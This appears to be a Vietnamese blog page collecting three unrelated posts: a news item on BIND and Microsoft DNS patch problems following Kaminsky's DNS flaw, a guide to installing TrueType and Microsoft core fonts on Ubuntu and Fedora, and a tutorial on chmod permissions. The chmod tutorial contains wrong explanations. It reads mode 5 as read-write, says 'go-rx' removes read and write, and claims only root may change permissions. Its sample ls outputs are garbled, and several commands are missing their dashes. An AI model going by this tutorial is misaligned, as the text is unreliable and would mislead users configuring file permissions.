Tuy không chỉ rõ về phạm vi của các vấn đề hiệu suất đang phải đối mặt với các máy chủ DNS, nhưng Vixie đã nói rằng loạt các bản vá thứ hai, dự kiến sẽ phát hành vào cuối tuần này, sẽ cung cấp các vấn đề định cổng và cho phép các truy vấn TCP cũng như sự truyền tải giữa các vùng trong khi đó vẫn phát hành các truy vấn UDP tồn tại nếu có thể.

Các phiên bản của nâng cấp thứ hai, có tên mã P2, hiện đang được cung cấp dưới biểu mẫu beta cho BIND 9.4.3 và BIND 9.5.1.

Tuy nhiên Vixie đã nhấn mạnh rằng các quản trị viên không nên bỏ các phiên bản vá 8/7 thậm chí nếu các máy chủ của họ đang chạy một cách chậm chạp. Cho tới khi nào phát hành P2 thì lỗ hổng mới liên quan nhiều hơn một máy chủ chậm chạp, Vixie nói vậy.

Lỗ hổng mà Kaminsky đã phát hiện ra trong tháng Hai về việc chèn các thông tin không có thật vào cơ sở hạ tầng định tuyến của Internet. Một tấn công thành công theo lỗi này sẽ cho phép các kẻ tội phạm lặng lẽ gửi các yêu cầu từ một site xác thực đến một site không có thật nhằm lấy cắp một thông tin cá nhân, chẳng hạn như các mật khẩu cho các tài khoản ngân hàng trực tuyến từ những người dùng bị chúng lừa bịp.

Trong thời gian đầu tháng này, khi Kaminsky tuyên bố rằng lỗ hổng này đã được vá dưới sự nỗ lực của một số hãng, trong đó có ISC, Microsoft Corp. và Cisco Systems Inc., ông ta đã rất hoan nghêng sự cộng tác tích cực giữa các hãng này.

Tuy nhiên giờ đây việc vá lỗi DNS lại đang trở thành một vấn đề quan trọng hơn khi tuần trước đã xuất hiện một hacker khai thác lỗi này.

Qua những sự việc vừa qua cho chúng ta thấy, ISC không chỉ là một hãng đầu tư nhiều vào nghiên cứu nhằm khắc phục lỗi DNS giai đoạn 1 mà hãng này đã mạnh bạo thừa nhận một lỗi của mình. Cũng vậy, hai tuần cách đây, Microsoft cũng đã xác nhận rằng, nâng cấp 8/7 của hãng này vừa qua, MS08-037, đã gây lỗi cho các máy chạy Windows Small Business Server, cùng với một số chương trình khác và Windows Server 2003.

Một số khách hàng đã báo cáo về việc phát hiện ra các lỗi ngẫu nhiêm với các dịch vụ sau khi họ cài đặt MS08-037 vào 17/7 vừa qua.

Một thành phần SBS có thể gây lỗi khi khởi động là IPSEC service, dịch vụ này sẽ ngắt kết nối máy chủ với mạng, Microsoft cho biết như vậy.

Thứ Sáu tuần trước, công ty đã tiết lộ một số tài liệu hỗ trợ đã được viết theo các khía cạnh không hề được dự tính trước cho bản vá, nhưng trong đó cũng đưa Exchange Server 2003 và Internet Security and Acceleration [ISA] Server vào danh sách các thành phần bị ảnh hưởng.

Một vấn đề thứ hai có liên quan đến mỗi phiên bản đã được hỗ trợ của Windows, từ Windows 2000, XP và Vista đến Server 2003 và Server 2008. Bạn có thể cảm nhận thấy các vấn đề phát sinh với các dịch vụ mạng phụ thuộc UDP sau khi cài đặt bản nâng cấp bảo mật cho dịch vụ Domain Name System [DNS] Server 953230 [MS08-037] và sau đó khởi động lại máy tính, Microsoft đã nói như vậy.

Trong cả hai trường hợp, Microsoft đều đưa ra những cách giải quyết trong các tài liệu hỗ trợ nhưng hãng này vẫn chưa nói thời điểm nào sẽ phát hành bản vá lại. Khi được hỏi về vấn đề này, người phát ngôn của công ty này đã nói rằng: Microsoft hiện chưa có kế hoạch nào để tái phát hành MS08-037.
Văn Linh [Theo ComputerWorld]

Leave a Response »

Bài này sẽ hướng dẫn bạn cách cài đặt các font True Type trên máy Fedora hay Ubuntu Linux, và làm thế nào để các ứng dụng như OpenOffice và Scribus có thể sử dụng các font này.

Dù bạn là một chuyên gia về đồ họa, người thường xuyên soạn thảo văn bản hay chuyên viên thiết kế thì bạn cũng cần cài đặt và sử dụng một số font đặc biệt. Đối với người dùng Linux thì đây là một nhiệm vụ khá phức tạp. Nhưng có một tin tốt là với các phát hành mới gần đây thì việc cài đặt font đã trở nên dễ dàng hơn.

Cài đặt font trong Ubuntu

Bạn có một bộ sưu tập các font True Type và lưu trữ nó trong một thư mục trên máy tính. Việc cài đặt thêm các font hệ thống sẽ giúp tất cả các người dùng trên máy đều có thể truy cập và sử dụng được chúng.

Đầu tiên, tạo một thư mục font trong /usr/share/fonts/truetype. Gọi thư mục này là newfonts. Thực hiện câu lệnh sudo mkdir /usr/share/fonts/truetype/newfonts. Bạn sẽ phải nhập vào mật khẩu sudo mới có thể thực hiện được thao tác này.

Sau khi thư mục đã được tạo, đặt toàn bộ các file *ttf hay *TTF của bạn vào thư mục newfonts này. Với việc đặt các font vào đúng vị trí bạn sẽ cần phải chạy câu lệnh fc-cache -f v để đảm bảo hệ thống nhận các font mới. Sau khi thực hiện xong lệnh này, hệ thống sẽ biết về các font mới và tất cả những người dùng trên máy đều có thể truy cập được tới chúng.

Nếu bạn chỉ muốn một số người dùng đặc biệt sử dụng được font mới, bạn phải chỉ cần thêm các font vào thư mục tương đương ~/.fonts của người dùng . Nếu thư mục ~/.fonts chưa có, hãy thực hiện lệnh tạo thư mục mkdir ~/.fonts [trong khi đang truy cập vào với tài khoản người dùng cần tạo]. Sau đó di chuyển [hoặc sao chép] toàn bộ các file *ttf và *TTF vào thư mục mới này và lại chạy lệnh fc-cache -f v để đảm bảo người dùng có thể sử dụng font.

Cài đặt font trong Fedora 7 [hoặc các phiên bản mới hơn]

Cài đặt font trong Fedora là một nhiệm vụ hoàn toàn đơn giản. Bạn chỉ cần đưa các file *ttf và *TTF vào trong thư mục ~/.fonts của người dùng, log out khỏi hệ thống sau đó login trở lại. các font sẽ được chấp nhận mà không cần phải thực hiện thêm bất cứ thao tác gì đặc biệt.

Cài đặt các font MS

Đôi khi bạn cần sử dụng các font của Microsoft trong hệ thống của mình. Thật ra việc này chỉ là vấn đề cần cài đặt thêm gói msttcorefonts. Có thể làm theo một trong hai cách sau:

Trên một máy apt:

apt-get install msttcorefonts

Trên một máy yum:

wget //corefonts.sourceforge.net/msttcorefonts-2.0-1.spec

yum install rpm-build cabextract

rpmbuild -ba msttcorefonts-2.0-1.spec

yum localinstall nogpgcheck /usr/src/redhat/RPMS/noarch/msttcorefonts-2.0-1.noarch.rpm

Cả hai trường hợp trên đều sẽ hoàn thành ngay mục đích của bạn. Câu lệnh cũ hơn sẽ yêu cầu bạn nhập OK trong quá trình chạy [như hình A]

Giới thiệu này nhắc bạn cài đặt x-ttcidfont-conf also, cái này không thực sự cần thiết nhưng sẽ thêm nhiều font hơn vào hệ thống của bạn.

Để các ứng dụng nhận được font mới

OpenOffice: Nếu bạn cài đặt các font vào thư mục ~/.fonts và thực hiện đầy đủ câu lệnh fc-cache -f -v, thì OpenOffice sẽ có thể nhận được ngay các font.

Gimp: Ứng dụng này cũng tương tự như OpenOffice

Scribus: Với Scribus bạn phải cấu hình cho nó nhận diện đường dẫn font mới. Để thực hiện điều này, bạn vào File | Preferences và sẽ thấy biểu tượng font như hình B dưới đây:

Trong màn hình này, bạn có thể cấu hình tất cả các thành phần hiển thị trên màn hình của ứng dụng Scribus.

Kích vào biểu tượng Fonts và sau đó kích vào tab Additional Paths [như hình C]

Kích vào nút Add và điều hướng tới đường dẫn font mới.

Bạn sẽ được nhắc nhở rằng khi kích vào Add để thêm đường dẫn mới, thư mục .fonts sẽ không hiển thị lên nữa. Điều này là vị nó là một thư mục ẩn. Bạn sẽ phải nhập .fonts trong vùng thư mục và kích OK để thêm thư mục ẩn.

GNOME/KDE: cả GNOME và KDE sẽ tự động sử dụng được các font đặt trong thư mục ~/.fonts. Bạn sẽ phải vào môi trường quản lý control panel mỗi khi muốn cấu hình sử dụng các font khác nhau cho từng thành phần trên desktop.
Theo TechRepublic ảnh quản trị mạng
Sưu tầm tài trợ bỏi //vedepvn.com

Leave a Response »

CHMOD là j?
CHMOD định nghĩa đơn giản chính là cụm từ viết tắt của Change Mode Một lệnh đặc biệt chỉ dùng trên các máy chủ hệ Unix [Linux, Solaris, True64] dùng để thay đổi quyền lực của một người bất kỳ đối với một tập tin, thư mục bất kỳ trên một website cụ thể. Bằng cách thay đổi chmod, bạn đồng thời gán một quyền lực cho một người nào đó đối với các tập tin, thư mục trong cấu trúc website của bạn.

Giá trị chmod luôn được biểu thị bằng một cụm gồm 3 chữ số [***] đại diện cho 3 người gồm: User [Owner Chủ sở hửu] Group [Nhóm cộng tác] Other [Guest Tất cả mọi người còn lại] và gồm các giá trị gồm 1 [Execute Thực thi], 2 [Write Ghi], 4 [Read Đọc]

The chmod Command

Lệnh chmod dùng để thực hiện thay đổi phân quyền file hoặc thư mục . Trong tất cả hệ điều hành linux , tất cả các file hoặc thư mục đều đc set quyền [doc_read , ghi_write, toan quyền_ execute] Với hệ thống linux chỉ có 1 chủ sở hữu root [superuser] mới có đủ quyền thay đổi quyền với các file [thư mục].
Ta có thể nhìn thấy quyền hạn của file bằng lệnh:
ls -l filename

Người ta dùng 3 số và mỗi số 3 bit đầu để chỉ nói sự điều khiển quyền hạn của file:
+ Bit đầu dùng để chỉ phân quyền của user [owner] đối với file
+Bit thứ 2 dùng để chỉ phân quyền của group
+..3.. everyone
The first set of three bits controls the permissions of the owner of the file, the second set controls the permissions of the group, and the last set controls the permissions for everyone else. The permissions are stored in the mode field of the files inode. The user must own the files to change permissions on them.[7]
[Tớ dịch đoạn này thấy ngu ngu nên để tiếng anh kèm theo]

.::Bảng phân quyền::
Decimal . Binary . Permissions

0 . 000 ..none

1 . 001 ..x

2 ..010 ..-w-

3 . 011 -wx

4 .100 r

5 .101 . r-x

6 .110 ..rw-

7..111 .. rwx
The symbolic notation for chmod is as follows: r = read; w = write; x = execute; u = user; g = group; o = others; a = all.

Giá trị chmod luôn được biểu thị bằng một cụm gồm 3 chữ số [***] đại diện cho 3 người gồm: User [Owner Chủ sở hửu] Group [Nhóm cộng tác] Other [Guest Tất cả mọi người còn lại] và gồm các giá trị gồm 1 [Execute Thực thi], 2 [Write Ghi], 4 [Read Đọc]

Ví dụ 1: chmod: 124 >>> Chủ sở hửu : 1 Nhóm cộng tác : 2 Mọi người : 4
Chủ sở hửu có quyền gọi thực thi tập tin, thư mục
Nhóm cộng tác có quyền ghi nội dung vào tập tin, thư mục
Mọi người có quyền xem nội dung tập tin, thư mục

Ví dụ 2: chmod: 412 >>> Chủ sở hửu : 4 Nhóm cộng tác : 1 Mọi người : 2

Chủ sở hửu có quyền xem nội dung tập tin, thư mục
Nhóm cộng tác có quyền gọi thực thi tập tin, thư mục
Mọi người có quyền ghi nội dung vào tập tin, thư mục

CHMOD 644, 666, 755, 777 là như thế nào?

Như trên đã trình bày, các giá trị chmod luôn là 1, 2, 4. Điều này đồng nghĩa với việc nếu bạn muốn cấp nhiều quyền lực hơn cho một người bất kỳ đối với tập tin, thư mục của bạn, bạn sẽ phải cộng các số lại với nhau. Kết quả ta sẽ có các giá trị:

1 = Quyền gọi thực thi
2 = Quyền ghi nội dung
3 = 1 + 2 = Quyền gọi thực thi + Quyền ghi nội dung
4 = Quyền xem nội dung
5 = 4 + 1 = Quyền xem nội dung + Quyền gọi thực thi
6 = 4 + 2 = Quyền xem nội dung + Quyền ghi nội dung
7 = 4 + 2 + 1 = Quyền xem nội dung + Quyền ghi nội dung + Quyền gọi thực thi

Như vậy, khi bạn có giá trị 7, quyền lực của bạn sẽ là tuyệt đối đối với tập tin, thư mục đó. Và ngược lại, khi bạn có giá trị 1, bạn sẽ có quyền lực thấp nhất.

Và cũng như trên đã nói, chmod không đứng riêng lẻ mà luôn đi thành cụm 3 chữ số để biểu thị cho quyền lực của User Group Other

Một số ví dụ:
1 $ chmod 755 file

$ ls l file

rwxrxrx 1 ellie 0 Mar 7 12:52 file

2 $ chmod g+w file

$ ls -l file

rwxrwxr-x 1 ellie 0 Mar 7 12:54 file

3 $ chmod go-rx file

$ ls -l file

rwx-w- 1 ellie 0 Mar 7 12:56 file

4 $ chmod a=r file

$ ls -l file

rrr 1 ellie 0 Mar 7 12:59 file

Giải thích:
1.Với lệnh này thì :
+user: giá trị 7 là toàn quyền rwx [read_write_execute]
+group:Giá trị 5 là có quyền rw
+other: Giá trị 5 là có quyền rw

2. Với lệnh $ chmod g+w file Là ta gán quyền write cho group bằng dấu công [+]

3. Với lệnh $ chmod go-rx file Hạn chế quyền read và write đối với group và other.

4. Với lệnh $ chmod a=r file là tất cả mọi người [a: all] đều đc quyền đọc file
5. Với dấu trừ phía trước thì đây là là 1 ký hiệu cờ [Nam có thể nói về mấy cái ký hiệu cờ phía trước này đc kô ]

Kết quả ta có các giá trị:

111, 112, 113, 114, 115, 116, 117, 121, 122, 123, 124, 125, 126, 127, 131, 132, 133, 134, 135, 136, 137, 141, 142, 143, 144, 145, 146, 147, 151, 152, 153, 154, 155, 156, 157, 161, 162, 163, 164, 165, 166, 167, 171, 172, 173, 174, 175, 176, 177, 211, 212, 213, 214, 215, 216, 217, 221, 222, 223, 224, 225, 226, 227, 231, 232, 233, 234, 235, 236, 237, 241, 242, 243, 244, 245, 246, 247, 251, 252, 253, 254, 255, 256, 257, 261, 262, 263, 264, 265, 266, 267, 271, 272, 273, 274, 275, 276, 277, 311, 312, 313, 314, 315, 316, 317, 321, 322, 323, 324, 325, 326, 327, 331, 332, 333, 334, 335, 336, 337, 341, 342, 343, 344, 345, 346, 347, 351, 352, 353, 354, 355, 356, 357, 361, 362, 363, 364, 365, 366, 367, 371, 372, 373, 374, 375, 376, 377, 411, 412, 413, 414, 415, 416, 417, 421, 422, 423, 424, 425, 426, 427, 431, 432, 433, 434, 435, 436, 437, 441, 442, 443, 444, 445, 446, 447, 451, 452, 453, 454, 455, 456, 457, 461, 462, 463, 464, 465, 466, 467, 471, 472, 473, 474, 475, 476, 477, 511, 512, 513, 614, 515, 516, 517, 521, 522, 523, 524, 525, 526, 527, 531, 532, 533, 534, 535, 536, 537, 541, 542, 543, 544, 545, 546, 547, 551, 552, 553, 554, 555, 556, 557,, 561, 562, 563, 564, 565, 566, 567, 571, 572, 573, 574, 575, 576, 577, 611, 612, 613, 614, 615, 616, 617, 621, 622, 623, 624, 625, 626, 627, 631, 632, 633, 634, 635, 636, 637, 641, 642, 643, 644, 645, 646, 647, 651, 652, 653, 654, 655, 656, 657, 661, 662, 663, 664, 665, 666, 667, 671, 672, 673, 674, 675, 676, 677, 711, 712, 713, 714, 715, 716, 717, 721, 722, 723, 724, 725, 726, 727, 731, 732, 733, 734, 735, 736, 737, 741, 742, 743, 744, 745, 746, 747, 751, 752, 753, 754, 755, 756, 757, 761, 762, 763, 764, 765, 766, 767, 771, 772, 773, 774, 775, 776, 777
Bản quyền thuộc CFH

Leave a Response »

Video liên quan

Chủ Đề